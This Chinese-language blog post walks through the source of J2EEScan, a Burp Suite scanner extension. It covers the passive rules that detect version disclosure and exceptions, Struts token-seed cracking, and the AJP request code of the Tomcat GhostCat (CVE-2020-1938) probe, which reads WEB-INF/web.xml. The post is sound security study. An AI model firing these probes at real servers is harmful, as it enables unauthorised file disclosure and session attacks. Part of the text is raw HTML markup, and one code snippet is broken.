【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)

【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)

前言

为了方便查阅,将下列文章合并

【BurpSuite】插件开发学习之J2EEScan(上)-被动扫描
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(1-10)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(11-20)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(21-30)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(31-40)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(41-50)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(51-60)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(61-76)

J2EEScan

https://github.com/PortSwigger/j2ee-scan.git
逻辑代码在

|____src
| |____main
| | |____java
| | | |____burp
| | | | |____HTTPMatcher.java
| | | | |____J2EELFIRetriever.java
| | | | |____SoftwareVersions.java
| | | | |____WeakPasswordBruteforcer.java
| | | | |____j2ee
| | | | | |____PassiveScanner.java
| | | | | |____Confidence.java
| | | | | |____annotation
| | | | | | |____RunOnlyOnce.java
| | | | | | |____RunOnlyOnceForApplicationContext.java
| | | | | |____Risk.java
| | | | | |____passive
| | | | | | |____SessionFixation.java
| | | | | | |____ApacheStrutsS2023Rule.java
| | | | | | |____JettyRule.java
| | | | | | |____HttpServerHeaderRule.java
| | | | | | |____SqlQueryRule.java
| | | | | | |____PassiveRule.java
| | | | | | |____strutstoken
| | | | | | | |____StrutsTokenCracker.java
| | | | | | | |____ReplayRandom.java
| | | | | | |____ApacheTomcatRule.java
| | | | | | |____SessionIDInURL.java
| | | | | | |____JSPostMessage.java
| | | | | | |____ExceptionRule.java
| | | | | |____IssuesHandler.java
| | | | | |____lib
| | | | | | |____TesterAjpMessage.java
| | | | | | |____SimpleAjpClient.java
| | | | | |____issues
| | | | | | |____impl
| | | | | | | |____OracleEBSSSRF.java
| | | | | | | |____OracleEBSSSRFLCMServiceController.java
| | | | | | | |____ApacheStrutsS2032.java
| | | | | | | |____NodeJSRedirect.java
| | | | | | | |____ApacheRollerOGNLInjection.java
| | | | | | | |____ApacheStrutsDebugMode.java
| | | | | | | |____ApacheAxis.java
| | | | | | | |____HTTPWeakPassword.java
| | | | | | | |____HTTPProxy.java
| | | | | | | |____PrimeFacesELInjection.java
| | | | | | | |____WeblogicUDDIExplorer.java
| | | | | | | |____ApacheStrutsS2052.java
| | | | | | | |____JBossWebConsole.java
| | | | | | | |____EL3Injection.java
| | | | | | | |____XXEParameterModule.java
| | | | | | | |____UndertowTraversal.java
| | | | | | | |____LFIModule.java
| | | | | | | |____ApacheStrutsS2043.java
| | | | | | | |____FastJsonRCE.java
| | | | | | | |____OracleReportService.java
| | | | | | | |____SnoopResource.java
| | | | | | | |____JBossJMXReadOnly.java
| | | | | | | |____WebInfInformationDisclosure.java
| | | | | | | |____XInclude.java
| | | | | | | |____JavaServerFacesTraversal.java
| | | | | | | |____Seam2RCE.java
| | | | | | | |____WeblogicConsole.java
| | | | | | | |____RESTAPISwagger.java
| | | | | | | |____JettyRemoteLeakage.java
| | | | | | | |____JBossJMXInvoker.java
| | | | | | | |____OASConfigFilesDisclosure.java
| | | | | | | |____JacksonDataBindCVE20177525.java
| | | | | | | |____XXEModule.java
| | | | | | | |____WeblogicCVE20192725.java
| | | | | | | |____WeblogicWebServiceTestPageCVE20182894.java
| | | | | | | |____JKStatus.java
| | | | | | | |____WeblogicCVE201710271.java
| | | | | | | |____LFIAbsoluteModule.java
| | | | | | | |____ApacheStrutsS2016.java
| | | | | | | |____ApacheStrutsShowcase.java
| | | | | | | |____ApacheStrutsWebConsole.java
| | | | | | | |____ApacheStrutsS2020.java
| | | | | | | |____StatusServlet.java
| | | | | | | |____UTF8ResponseSplitting.java
| | | | | | | |____TomcatHostManager.java
| | | | | | | |____SpringBootRestRCE.java
| | | | | | | |____PivotalSpringTraversalCVE20143625.java
| | | | | | | |____Htaccess.java
| | | | | | | |____JBossjBPMAdminConsole.java
| | | | | | | |____ELInjection.java
| | | | | | | |____NodeJSPathTraversal.java
| | | | | | | |____ApacheStrutsS2017.java
| | | | | | | |____ApacheSolrXXE.java
| | | | | | | |____OASSqlnetLogDisclosure.java
| | | | | | | |____NodeJSResponseSplitting.java
| | | | | | | |____URINormalizationTomcat.java
| | | | | | | |____JBossWS.java
| | | | | | | |____SpringCloudConfigPathTraversal.java
| | | | | | | |____InfrastructurePathTraversal.java
| | | | | | | |____AJPDetector.java
| | | | | | | |____JBossAdminConsole.java
| | | | | | | |____SSRFScanner.java
| | | | | | | |____SpringDataCommonRCE.java
| | | | | | | |____JavascriptSSRF.java
| | | | | | | |____ApacheWicketArbitraryResourceAccess.java
| | | | | | | |____SpringBootActuator.java
| | | | | | | |____IDocInjection.java
| | | | | | | |____TomcatManager.java
| | | | | | | |____NextFrameworkPathTraversal.java
| | | | | | | |____OracleCGIPrintEnv.java
| | | | | | | |____JBossJuddi.java
| | | | | | | |____AJP_Tomcat_GhostCat.java
| | | | | | | |____SpringWebFlowDataBindExpressionCVE20174971.java
| | | | | | |____IModule.java
| | | | | |____CustomScanIssue.java
| | | | |____J2EELocalAssessment.java
| | | | |____WeakPassword.java
| | | | |____HTTPParser.java
| | | | |____CustomHttpRequestResponse.java
| | | | |____BurpExtender.java

这个代码是基于java写的

BurpExtender

老样子,继承BurpExtender

class BurpExtender(IBurpExtender):

基本信息也和java差不多

public void registerExtenderCallbacks(final IBurpExtenderCallbacks callbacks) {
        // keep a reference to our callbacks object
        this.callbacks = callbacks;
        this.callbacks.registerExtensionStateListener(this);
        // obtain an extension helpers object
        helpers = callbacks.getHelpers();
        // obtain our output stream
        stdout = new PrintWriter(callbacks.getStdout(), true);
        stderr = new PrintWriter(callbacks.getStderr(), true);

        // set our extension name
        callbacks.setExtensionName("J2EE Advanced Tests");

然后创建了一个临时数据库文件并连接了

j2eeDBState = File.createTempFile("burpsuite-j2eescan-state", ".db");
            stdout.println("Using temporary db state file: " + j2eeDBState.getAbsolutePath());
            stdout.println("This internal state is used to avoid duplicate infrastructure security "
                    + "checks on the same host, improving the scan performance");

            connectToDatabase(j2eeDBState.getAbsolutePath());

初始化的数据库表executed_plugins

String fields = "plugin, host, port";

        conn.createStatement().executeUpdate("CREATE TABLE IF NOT EXISTS executed_plugins ("
                + " plugin TEXT PRIMARY KEY,"
                + " host TEXT,"
                + " port INTEGER,"
                + " UNIQUE(" + fields + "))");

doPassiveScan

重写了被动扫描,在PassiveScanner这个类里。

PassiveScanner.scanVulnerabilities(baseRequestResponse, callbacks);

遍历如下规则进行扫描

static PassiveRule[] PASSIVE_RULES = {
            new ApacheTomcatRule(),
            new ExceptionRule(),
            new HttpServerHeaderRule(),
            new SqlQueryRule(),
            new ApacheStrutsS2023Rule(),
            new JettyRule(),
            new SessionIDInURL(),
            new JSPostMessage(),
            new SessionFixation()
    };

一个一个看,

ApacheTomcatRule

【1】tomcat版本发现

Risk.Low

Pattern.compile("Apache Tomcat/([\\d\\.]+)"

【2】tomcat远程jvm虚拟机

Risk.Information

Pattern.compile("\">(1\\.\\d\\.[\\w\\-\\_\\.]+)<"

ExceptionRule

【3】Apache Struts 测试页面

判断struts是开发环境还是dev环境
Risk.Low

"Struts Problem Report".getBytes();

【4】Apache Tapestry 异常错误展示

Risk.Low

            byte[] tapestryException = "

An unexpected application exception has occurred.

"
.getBytes();

【5】Grails 异常错误展示

Risk.Low

            byte[] grailsException = "

Grails Runtime Exception

"
.getBytes();

【6】GWT 异常错误展示

Risk.Low

            byte[] gwtException = "com.google.gwt.http.client.RequestException".getBytes();

【7】java 常见的应用异常错误展示

Risk.Low

List<byte[]> javaxServletExceptions = Arrays.asList(
                    "javax.servlet.ServletException".getBytes(),
                    "οnclick=\"toggle('full exception chain stacktrace".getBytes(),
                    "at org.apache.catalina".getBytes(),
                    "at org.apache.coyote.".getBytes(),
                    "at org.jboss.seam.".getBytes(),
                    "at org.apache.tomcat.".getBytes(),
                    "JSP Processing Error".getBytes(),  // WAS
                    "The full stack trace of the root cause is available in".getBytes());
                    "
com.sun.facelets.FaceletException".getBytes(),
                    "Generated by MyFaces - for information on disabling".getBytes(),
                    "Error - org.apache.myfaces"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
                    <span class="token string">"org.primefaces.webapp"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <h3>HttpServerHeaderRule</h3> 
  <p>http 头泄露应用版本号</p> 
  <h4>【8】Java&Jetty &GlassFish&Weblogic</h4> 
  <pre><code class="prism language-java"><span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"java\\/([\\d\\.\\_]+)"</span>
<span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"Jetty.([\\d\\.]+)"</span>
<span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"GlassFish Server Open Source Edition ([\\d\\.]+)"</span>
<span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"WebLogic (:?Server )?([\\d\\.]+)"</span>
</code></pre> 
  <h4>【10】 oracle</h4> 
  <pre><code class="prism language-java">ORACLE_APPLICATION_SERVER_RE<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"Oracle Application Server Containers for J2EE 10g \\(([\\d\\.]+)\\)"</span><span class="token punctuation">,</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>DOTALL<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
ORACLE_APPLICATION_SERVER_RE<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"Oracle.Application.Server.10g\\/([\\d\\.]+)"</span><span class="token punctuation">,</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>DOTALL<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
ORACLE_APPLICATION_SERVER_RE<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"Oracle Application Server\\/([\\d\\.]+)"</span><span class="token punctuation">,</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>DOTALL<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
ORACLE_APPLICATION_SERVER_RE<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"Oracle9iAS\\/([\\d\\.]+)"</span><span class="token punctuation">,</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>DOTALL<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <h4>【11】nodejs</h4> 
  <pre><code class="prism language-java"><span class="token keyword">if</span> <span class="token punctuation">(</span>xPoweredByHeader<span class="token punctuation">.</span><span class="token function">trim</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">equals</span><span class="token punctuation">(</span><span class="token string">"Express"</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
</code></pre> 
  <h3>SqlQueryRule</h3> 
  <h4>【12】SQL exception</h4> 
  <pre><code class="prism language-java">SQL_QUERIES_RE<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"select "</span><span class="token punctuation">,</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>CASE_INSENSITIVE <span class="token operator">|</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>DOTALL <span class="token operator">|</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>MULTILINE<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
SQL_QUERIES_RE<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"IS NOT NULL"</span><span class="token punctuation">,</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>CASE_INSENSITIVE <span class="token operator">|</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>DOTALL <span class="token operator">|</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>MULTILINE<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <h3>ApacheStrutsS2023Rule</h3> 
  <h5>【13】StrutsTokenCracker</h5> 
  <p>提取token</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">final</span> <span class="token class-name">Pattern</span> TOKEN_FIELD_PATTERN <span class="token operator">=</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"<input type=\"hidden\" name=\"token\" value=\"([^\"]+)\""</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>转int,按固定长度切割</p> 
  <pre><code class="prism language-java"> <span class="token keyword">int</span><span class="token punctuation">[</span><span class="token punctuation">]</span> tokenInts <span class="token operator">=</span> <span class="token function">bytesToInt</span><span class="token punctuation">(</span><span class="token function">bigIntToByte</span><span class="token punctuation">(</span>token<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>根据int找到seed</p> 
  <pre><code class="prism language-java">        <span class="token keyword">long</span> seed <span class="token operator">=</span> <span class="token function">findSeed</span><span class="token punctuation">(</span><span class="token function">reverseByteOrder</span><span class="token punctuation">(</span>tokenInts<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token function">reverseByteOrder</span><span class="token punctuation">(</span>tokenInts<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>根据种子预测随机数,和就token匹配,如果能匹配上,说明种子是对的,也就是说明token可预测。</p> 
  <pre><code class="prism language-java"><span class="token keyword">int</span><span class="token punctuation">[</span><span class="token punctuation">]</span> nextInts <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token keyword">int</span><span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token keyword">for</span><span class="token punctuation">(</span><span class="token keyword">int</span> i<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">;</span>i<span class="token operator"><</span>nextInts<span class="token punctuation">.</span>length<span class="token punctuation">;</span>i<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
            nextInts<span class="token punctuation">[</span>i<span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token function">reverseByteOrder</span><span class="token punctuation">(</span>random<span class="token punctuation">.</span><span class="token function">nextInt</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>

        <span class="token keyword">boolean</span> match1 <span class="token operator">=</span> tokenInts<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span> <span class="token operator">==</span> nextInts<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token keyword">boolean</span> match2 <span class="token operator">=</span> tokenInts<span class="token punctuation">[</span><span class="token number">3</span><span class="token punctuation">]</span> <span class="token operator">==</span> nextInts<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token keyword">boolean</span> match3 <span class="token operator">=</span> tokenInts<span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">]</span> <span class="token operator">==</span> nextInts<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">;</span>

</code></pre> 
  <h3>JettyRule</h3> 
  <h4>【14】Jetty发现</h4> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">Pattern</span> JETTY_PATTERN <span class="token operator">=</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"><small>Powered by Jetty"</span><span class="token punctuation">,</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>DOTALL <span class="token operator">|</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>MULTILINE<span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <h3>SessionIDInURL</h3> 
  <h4>【15】Session Token in URL</h4> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> <span class="token class-name">SESSIONIDs</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">ArrayList</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span><span class="token string">";jsessionid"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <h3>JSPostMessage</h3> 
  <h4>【16】JSPostMessage函数</h4> 
  <p>js的跨域信息通信的函数。</p> 
  <pre><code class="prism language-java">POSTMESSAGE_PATTERNS<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">".addEventListener\\(\"message"</span><span class="token punctuation">,</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>CASE_INSENSITIVE <span class="token operator">|</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>DOTALL <span class="token operator">|</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>MULTILINE<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
POSTMESSAGE_PATTERNS<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"window\\).on\\(\"message"</span><span class="token punctuation">,</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>CASE_INSENSITIVE <span class="token operator">|</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>MULTILINE<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
POSTMESSAGE_PATTERNS<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">".postMessage\\("</span><span class="token punctuation">,</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>CASE_INSENSITIVE <span class="token operator">|</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span>MULTILINE<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <h3>SessionFixation</h3> 
  <h4>【17】session fixation attack(固定会话攻击)</h4> 
  <p>先检查url,这个检查很粗糙,直接判断后缀,还是黑名单,没有后缀就默认通过</p> 
  <pre><code class="prism language-java"><span class="token function">isJavaApplicationByURL</span><span class="token punctuation">(</span>curURL<span class="token punctuation">)</span>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/df4c25a187da43f3b7776f3ed5300ae8.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/df4c25a187da43f3b7776f3ed5300ae8.jpg" alt="【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第1张图片" width="650" height="388" style="border:1px solid black;"></a></p> 
  <p>然后条件是请求包有JSESSIONID且返回包含有账号等信息</p> 
  <pre><code class="prism language-java"><span class="token keyword">if</span> <span class="token punctuation">(</span>requestCookie <span class="token operator">!=</span> <span class="token keyword">null</span> <span class="token operator">&&</span> requestCookie<span class="token punctuation">.</span><span class="token function">contains</span><span class="token punctuation">(</span><span class="token string">"JSESSIONID"</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token class-name">String</span> reqBodyLowercase <span class="token operator">=</span> reqBody<span class="token punctuation">.</span><span class="token function">toLowerCase</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">if</span> <span class="token punctuation">(</span>reqBodyLowercase <span class="token operator">!=</span> <span class="token keyword">null</span>
                    <span class="token operator">&&</span> <span class="token punctuation">(</span>reqBodyLowercase<span class="token punctuation">.</span><span class="token function">contains</span><span class="token punctuation">(</span><span class="token string">"password"</span><span class="token punctuation">)</span> <span class="token operator">||</span> reqBodyLowercase<span class="token punctuation">.</span><span class="token function">contains</span><span class="token punctuation">(</span><span class="token string">"pwd"</span><span class="token punctuation">)</span> <span class="token operator">||</span> reqBodyLowercase<span class="token punctuation">.</span><span class="token function">contains</span><span class="token punctuation">(</span><span class="token string">"passw"</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
                    <span class="token operator">&&</span> <span class="token punctuation">(</span>reqBodyLowercase<span class="token punctuation">.</span><span class="token function">contains</span><span class="token punctuation">(</span><span class="token string">"user"</span><span class="token punctuation">)</span> <span class="token operator">||</span> reqBodyLowercase<span class="token punctuation">.</span><span class="token function">contains</span><span class="token punctuation">(</span><span class="token string">"uid"</span><span class="token punctuation">)</span> <span class="token operator">||</span> reqBodyLowercase<span class="token punctuation">.</span><span class="token function">contains</span><span class="token punctuation">(</span><span class="token string">"mail"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>

</code></pre> 
  <p>并且返回包没有setcookie(说明固定了会话),或者setcookie字段里包含JSESSIONID<br> 这种校验比较粗糙,注释也说了</p> 
  <p>Due to the nature of the vulnerability, this check is prone to False Positives and must be manually confirmed<br> <a href="http://img.e-com-net.com/image/info8/5d84545319514d96b9554d19bbeaf626.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/5d84545319514d96b9554d19bbeaf626.jpg" alt="在这里插入图片描述" width="650" height="49"></a></p> 
  <h2>doActiveScan</h2> 
  <p>直接从package里取class</p> 
  <pre><code class="prism language-java">j2eeTests <span class="token operator">=</span> <span class="token function">getClassNamesFromPackage</span><span class="token punctuation">(</span><span class="token string">"burp.j2ee.issues.impl."</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>再取每个类里面的scan方法</p> 
  <pre><code class="prism language-java"><span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token class-name">Method</span> m <span class="token operator">:</span> j2eeModule<span class="token punctuation">.</span><span class="token function">getClass</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">getMethods</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>m<span class="token punctuation">.</span><span class="token function">getName</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">equals</span><span class="token punctuation">(</span><span class="token string">"scan"</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
</code></pre> 
  <p>根据scan函数的注解</p> 
  <pre><code class="prism language-java"><span class="token class-name">RunOnlyOnce</span> annotationRunOnlyOnce <span class="token operator">=</span> m<span class="token punctuation">.</span><span class="token function">getAnnotation</span><span class="token punctuation">(</span><span class="token class-name">RunOnlyOnce</span><span class="token punctuation">.</span><span class="token keyword">class</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>

                                <span class="token comment">// log the plugin is executed once</span>
                                <span class="token function">pluginExecutedOnce</span><span class="token punctuation">(</span><span class="token keyword">module</span><span class="token punctuation">,</span> host<span class="token punctuation">,</span> port<span class="token punctuation">)</span><span class="token punctuation">;</span>


</code></pre> 
  <p>记录下什么漏洞只需要攻击一次,写入数据库</p> 
  <pre><code class="prism language-java"><span class="token keyword">public</span> <span class="token keyword">void</span> <span class="token function">pluginExecutedOnce</span><span class="token punctuation">(</span><span class="token class-name">String</span> pluginClass<span class="token punctuation">,</span> <span class="token class-name">String</span> host<span class="token punctuation">,</span> <span class="token keyword">int</span> port<span class="token punctuation">)</span> <span class="token keyword">throws</span> <span class="token class-name">SQLException</span> <span class="token punctuation">{</span>

        <span class="token class-name">PreparedStatement</span> stmt <span class="token operator">=</span> conn<span class="token punctuation">.</span><span class="token function">prepareStatement</span><span class="token punctuation">(</span><span class="token string">"INSERT INTO executed_plugins VALUES(?,?,?)"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        stmt<span class="token punctuation">.</span><span class="token function">setString</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span> pluginClass<span class="token punctuation">)</span><span class="token punctuation">;</span>
        stmt<span class="token punctuation">.</span><span class="token function">setString</span><span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">,</span> host<span class="token punctuation">)</span><span class="token punctuation">;</span>
        stmt<span class="token punctuation">.</span><span class="token function">setInt</span><span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">,</span> port<span class="token punctuation">)</span><span class="token punctuation">;</span>

        stmt<span class="token punctuation">.</span><span class="token function">executeUpdate</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token punctuation">}</span>

</code></pre> 
  <p>否则就是所有的目标都可以scan<br> 逻辑讲完了,现在可以看看具体的package里面有哪些漏洞了,一共73个,一个一个来<a href="http://img.e-com-net.com/image/info8/18809d0c296a4e6b81943a8368bd3385.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/18809d0c296a4e6b81943a8368bd3385.jpg" alt="【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第2张图片" width="650" height="339" style="border:1px solid black;"></a><br> 73个impl里面可能有好几种类型的漏洞,放在一篇里面比较重,所以每10个为一个单位,拆分发布吧。</p> 
  <h4>【1】AJP Tomcat GhostCat(webapp目录文件读取) - CVE-2020-1938</h4> 
  <ul> 
   <li>RunOnlyOnce</li> 
   <li>https://github.com/threedr3am/learnjavabug/tree/master/tomcat/ajp-bug/src/main/java/com/threedr3am/bug/tomcat/ajp</li> 
   <li>原理: https://zhuanlan.zhihu.com/p/137527937</li> 
  </ul> 
  <p>先连接默认端口</p> 
  <pre><code class="prism language-java">ac<span class="token punctuation">.</span><span class="token function">connect</span><span class="token punctuation">(</span>host<span class="token punctuation">,</span> DEFAULT_AJP_PORT<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">int</span> DEFAULT_AJP_PORT <span class="token operator">=</span> <span class="token number">8009</span><span class="token punctuation">;</span>
</code></pre> 
  <p>然后构造ajp请求包发送</p> 
  <pre><code class="prism language-java"><span class="token class-name">TesterAjpMessage</span> forwardMessage <span class="token operator">=</span> ac<span class="token punctuation">.</span><span class="token function">createForwardMessage</span><span class="token punctuation">(</span>uri<span class="token punctuation">)</span><span class="token punctuation">;</span>
                forwardMessage<span class="token punctuation">.</span><span class="token function">addAttribute</span><span class="token punctuation">(</span><span class="token string">"javax.servlet.include.request_uri"</span><span class="token punctuation">,</span> <span class="token string">"1"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
                forwardMessage<span class="token punctuation">.</span><span class="token function">addAttribute</span><span class="token punctuation">(</span><span class="token string">"javax.servlet.include.path_info"</span><span class="token punctuation">,</span> WEBINF_PATH<span class="token punctuation">)</span><span class="token punctuation">;</span>
                forwardMessage<span class="token punctuation">.</span><span class="token function">addAttribute</span><span class="token punctuation">(</span><span class="token string">"javax.servlet.include.servlet_path"</span><span class="token punctuation">,</span> <span class="token string">""</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
                forwardMessage<span class="token punctuation">.</span><span class="token function">end</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

                ac<span class="token punctuation">.</span><span class="token function">sendMessage</span><span class="token punctuation">(</span>forwardMessage<span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>其中比较关键的是参数:<strong>javax.servlet.include.path_info</strong>,value是</p> 
  <pre><code class="prism language-java">     <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> WEBINF_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
                <span class="token string">"/"</span> <span class="token operator">+</span> contextPath <span class="token operator">+</span> <span class="token string">"/WEB-INF/web.xml"</span><span class="token punctuation">,</span>
                <span class="token string">"WEB-INF/web.xml"</span>
        <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
